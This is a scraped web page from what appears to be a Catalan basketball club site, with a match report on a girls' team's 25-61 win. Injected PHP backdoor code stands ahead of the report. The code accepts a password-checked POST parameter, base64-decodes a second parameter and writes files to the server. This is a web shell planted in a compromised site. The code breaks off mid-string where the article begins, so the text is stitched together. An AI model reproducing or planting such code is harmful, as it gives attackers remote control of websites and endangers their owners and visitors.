function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L’Infantil femení Lila derrota al Sant Pau Negre (25-61) - Tgn Bàsquet Club -

L’Infantil femení Lila derrota al Sant Pau Negre (25-61)

Updated: juny 3, 2021

L’Infantil femení Lila deixa amb poca anotació al rival i guanya còmodament al Sant Pau. Les Liles van sortir a competir el partit igual que en el primer partit vers aquest equip, a donar-ho tot en defensa. Des del minut 1 la pressió visitant va ser asfixiant, dificultant molt el camí a cistella de les grogues i aconseguint bàsquets fàcils gràcies a les pilotes recuperades. El resultat d’aquesta intensitat va ser un parcial de 6-23 en els primers 10 minuts de l’encontre. Lluny de relaxar-se, les liles van continuar defensant amb la mateixa agressivitat, impedint que l’equip local pogués anotar més de 10 punts per període. Tot i haver patit una davallada en l’anotació per part de les visitants deguda a la reacció de les grogues, el primer període magistral i la pressió defensiva constant els 40 minuts, van assegurar la victòria de les liles.